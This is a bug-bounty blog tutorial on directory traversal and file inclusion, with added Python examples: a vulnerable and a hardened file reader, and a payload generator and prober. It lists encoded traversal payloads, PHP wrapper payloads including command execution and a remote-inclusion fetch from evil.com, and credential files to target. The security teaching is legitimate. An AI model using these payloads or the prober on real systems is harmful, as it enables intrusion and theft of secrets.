RatSec Blog

Directory Traversal, Quick Guide

- Posted in Bug bounties by


Directory traversal, also known as path traversal, is a vulnerability that lets an attacker read (and sometimes write) files and directories outside the directory the application intended to expose. Reading alone can disclose sensitive data such as credentials, keys or source code; combined with a file-inclusion bug or a writable location, it can lead to remote code execution.

  • Understanding the vulnerability: Directory traversal occurs when user input that ends up in a file path is not properly validated or sanitized, so an attacker can include sequences such as "../" to step out of the intended directory. For example, consider a web application that lets users upload files into a specific directory. If the application does not validate the file path, an attacker could write the file into a different directory on the server, potentially overwriting existing files or reaching sensitive data.
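To make that failure concrete, here is an added example in Python (not code from the RatSec post): a deliberately vulnerable file lookup beside a hardened one, exercised against a constructed directory tree so it runs offline. The directory layout, file names and file contents are invented for the demonstration.

```python
# Added example (not from the RatSec post): a deliberately vulnerable file
# lookup next to a hardened one, run against a constructed directory tree so
# it works offline. Paths, file names and contents are all made up here.
import os
import shutil
import tempfile
from typing import Dict, Tuple


def setup_demo_tree() -> Tuple[str, str]:
    """Create <root>/app/public (the directory the app means to serve) and
    <root>/secret.txt (a stand-in for a sensitive file two levels above it)."""
    root = tempfile.mkdtemp(prefix="travdemo_")
    public = os.path.join(root, "app", "public")
    os.makedirs(public)
    with open(os.path.join(public, "index.html"), "w") as f:
        f.write("<h1>hello</h1>")
    with open(os.path.join(root, "secret.txt"), "w") as f:
        # constructed content imitating the first line of /etc/passwd
        f.write("root:x:0:0:root:/root:/bin/bash\n")
    return root, public


def read_vulnerable(public_dir: str, user_path: str) -> str:
    """Deliberately vulnerable: the user-controlled path is joined onto the
    base directory with no check that the result stays inside it. Two things
    go wrong: '../' components walk upward, and os.path.join() discards the
    base entirely when user_path is absolute."""
    target = os.path.join(public_dir, user_path)
    with open(target) as f:
        return f.read()


def read_hardened(public_dir: str, user_path: str) -> str:
    """Hardened: strip leading separators so an absolute path cannot replace
    the base, canonicalise with realpath() (resolves '..', duplicate
    separators and symlinks), then require the result to lie under the base."""
    base = os.path.realpath(public_dir)
    target = os.path.realpath(os.path.join(base, user_path.lstrip("/\\")))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"path escapes {base}: {user_path!r}")
    with open(target) as f:
        return f.read()


def demo() -> Dict[str, object]:
    """Exercise both readers against the constructed tree and report results."""
    root, public = setup_demo_tree()
    try:
        results: Dict[str, object] = {
            "legit": read_hardened(public, "index.html"),
            "legit_leading_slash": read_hardened(public, "/index.html"),
            # relative traversal: two '../' climb from app/public up to <root>
            "vuln_relative": read_vulnerable(public, "../../secret.txt"),
            # absolute path: join() throws the base away and reads <root>/secret.txt directly
            "vuln_absolute": read_vulnerable(public, os.path.join(root, "secret.txt")),
        }
        try:
            read_hardened(public, "../../secret.txt")
            results["hardened_leaks"] = True
        except PermissionError:
            results["hardened_leaks"] = False
        return results
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:22} {value!r}")
```

The hardened version depends on two things: stripping leading separators so an absolute input cannot replace the base (os.path.join() otherwise discards everything before an absolute component), and comparing realpath() results rather than raw strings, so ".." segments and symlinks are resolved before the containment check rather than after it.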

  • Identifying directory traversal vulnerabilities: To identify directory traversal vulnerabilities, you can use a variety of tools and techniques. One common technique is to use a fuzzer to submit input variations, including special characters and traversal sequences, to every parameter that looks like a file name or path. You can also test manually by requesting a well-known file outside the intended directory (such as /etc/passwd) and checking whether its contents come back.

Here are some specific techniques you can use to identify directory traversal vulnerabilities:

Test different input variations, including special characters and traversal sequences such as "../" and "..\".
Test different file extensions, since some applications only allow certain file types to be uploaded, or append an extension (such as ".php") to whatever you supply.
Test different file paths, both absolute and relative.
Test different encoding schemes, such as URL encoding, double URL encoding, or base64 where the input is decoded server-side.
Test different user roles, since some applications only allow certain users to upload or view files.

Remember to switch up payloads.

  • Exploiting directory traversal vulnerabilities: Once you have identified a directory traversal vulnerability, you can attempt to exploit it by crafting a payload that includes traversal sequences. For example, if the vulnerable application lets you specify a file path for uploads, you could attempt to write the file into a different directory by including "../" in the path.

The payload will depend on the specific application and vulnerability, but here are some general techniques you can use:

Use "../" to move up one directory level per occurrence.
Use a leading "/" to start from the root directory (an absolute path), in case the application does not prepend a base directory or joins paths in a way that discards it.
Use "%2e%2e%2f" as the URL-encoded form of "../"; if the application decodes twice, try the double-encoded "%252e%252e%252f".
Use "%2f" as the URL-encoded form of "/".
Use "%00" to inject a null byte that terminates the string early, which strips an extension the application appends; this only works against legacy back ends (for example PHP before 5.3.4).

Here are some examples of directory traversal payloads:

"../../../../etc/passwd"
"/etc/passwd"
"%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"
"%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"
"../../../../etc/passwd%00"
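The identification checklist and the exploitation techniques above, pulled together as an added example in Python that is not part of the RatSec post. It generates the payload variants listed (relative "../" chains at increasing depth, an absolute path, single and double URL encoding, a null-byte suffix, Windows separators), sends them through an injectable fetch function and flags responses that look like a known sensitive file, including the base64 output that a php://filter/convert.base64-encode read returns. The target application, its "page" parameter and the sample responses are constructed stand-ins.

```python
# Added example (not from the RatSec post): generate the payload variants the
# guide describes, send them through an injectable fetch function and flag
# responses that look like a known sensitive file. The target app, the "page"
# parameter and the sample responses are constructed for the example.
import base64
import re
from typing import Callable, List, Optional, Tuple
from urllib.parse import unquote

# Regexes that recognise the files most often used to prove traversal.
TARGET_MARKERS = {
    "etc/passwd": re.compile(r"^root:[^:]*:0:0:", re.M),
    "boot.ini": re.compile(r"\[boot loader\]", re.I),
    "win.ini": re.compile(r"\[fonts\]|\[extensions\]", re.I),
}


def pct_encode(s: str) -> str:
    """Percent-encode every non-alphanumeric character (lowercase hex), so
    '../' becomes '%2e%2e%2f'; applying it twice gives the double-encoded form."""
    return "".join(c if c.isalnum() else f"%{ord(c):02x}" for c in s)


def traversal_payloads(target: str, max_depth: int = 6) -> List[str]:
    """Candidate payloads for a target such as 'etc/passwd': an absolute path,
    then for each depth a plain '../' chain, its single- and double-URL-encoded
    forms, a null-byte-terminated form (legacy back ends only), a Windows
    backslash form and a '....//' form that survives one non-recursive strip."""
    target = target.lstrip("/")
    out = [f"/{target}"]
    for depth in range(1, max_depth + 1):
        rel = "../" * depth + target
        out += [
            rel,
            pct_encode(rel),
            pct_encode(pct_encode(rel)),
            rel + "%00",
            "..\\" * depth + target.replace("/", "\\"),
            "....//" * depth + target,
        ]
    return out


def classify(body: str) -> Optional[str]:
    """Return the name of the file `body` looks like, or None. A long base64
    run is decoded and checked too, which is how a php://filter/
    convert.base64-encode read comes back."""
    candidates = [body]
    m = re.search(r"[A-Za-z0-9+/]{40,}={0,2}", body)
    if m:
        try:
            candidates.append(base64.b64decode(m.group(0), validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            pass
    for text in candidates:
        for name, rx in TARGET_MARKERS.items():
            if rx.search(text):
                return name
    return None


def probe(fetch: Callable[[str], str], payloads: List[str]) -> List[Tuple[str, str]]:
    """Send every payload through fetch(payload) -> response body and return
    (payload, file) pairs that classify() recognises. fetch is injected so the
    same loop works with a real client (e.g. requests.get(url, params={"page": p}).text)
    and with the offline stub below."""
    hits = []
    for p in payloads:
        found = classify(fetch(p))
        if found:
            hits.append((p, found))
    return hits


# Constructed stand-in for /etc/passwd on the fake target.
FAKE_PASSWD = "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33::/var/www:/usr/sbin/nologin\n"


def fake_vulnerable_fetch(payload: str) -> str:
    """Offline stub of a vulnerable app: a naive blacklist rejects the literal
    '../', but the value is URL-decoded only *after* that check, so encoded
    traversal sequences get through; php://filter reads come back base64."""
    prefix = "php://filter/convert.base64-encode/resource="
    b64 = payload.startswith(prefix)
    if b64:
        payload = payload[len(prefix):]
    if "../" in payload:
        return "403 Forbidden"
    if unquote(payload).replace("../", "").lstrip("/") != "etc/passwd":
        return "404 Not Found"
    return base64.b64encode(FAKE_PASSWD.encode()).decode() if b64 else FAKE_PASSWD


if __name__ == "__main__":
    for payload, name in probe(fake_vulnerable_fetch, traversal_payloads("etc/passwd", 4)):
        print(f"{name:<12} <- {payload}")
```

Against the stub, the plain "../../../../etc/passwd" is blocked while its URL-encoded twin "%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd" leaks the file, which is exactly the filter-ordering bug that makes switching encodings worthwhile. To run it for real, replace fake_vulnerable_fetch with a function that puts the payload in the suspect parameter and returns the response body.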

Using PHP wrappers (when the parameter is passed to include/require rather than to a plain file read):

/example1.php?page=expect://ls
Executes a command; needs the expect extension, which is not enabled by default.

/example1.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd
Returns the file base64-encoded, so PHP source can be read instead of executed.

/example.com/index.php?page=http://evil.com/shell.txt
Remote file inclusion; only works with allow_url_include=On.

Useful LFI Files

Linux

/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/home/$USER/.ssh/authorized_keys
/home/$USER/.ssh/id_rsa
/proc/[0-9]*/fd/[0-9]*
/proc/mounts
/home/$USER/.bash_history
/var/run/secrets/kubernetes.io/serviceaccount/token
/var/lib/mlocate/mlocate.db
/var/lib/mlocate.db

Apache

/etc/apache2/apache2.conf
/usr/local/etc/apache2/httpd.conf
/etc/httpd/conf/httpd.conf
/var/log/httpd/access_log (Red Hat/CentOS/Fedora Linux)
/var/log/apache2/access.log (Ubuntu)
/var/log/httpd-access.log (FreeBSD)
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache2/error.log

MySQL

/var/lib/mysql/mysql/user.frm
/var/lib/mysql/mysql/user.MYD
/var/lib/mysql/mysql/user.MYI

Windows

/boot.ini
/autoexec.bat
/windows/system32/drivers/etc/hosts
/windows/repair/SAM
/windows/panther/unattended.xml
/windows/panther/unattend/unattended.xml
/windows/system32/license.rtf
/windows/system32/eula.txt

Remember to use your skills responsibly & only practise on sites you have permission to test.

You can practise here on our labs: LFI Labs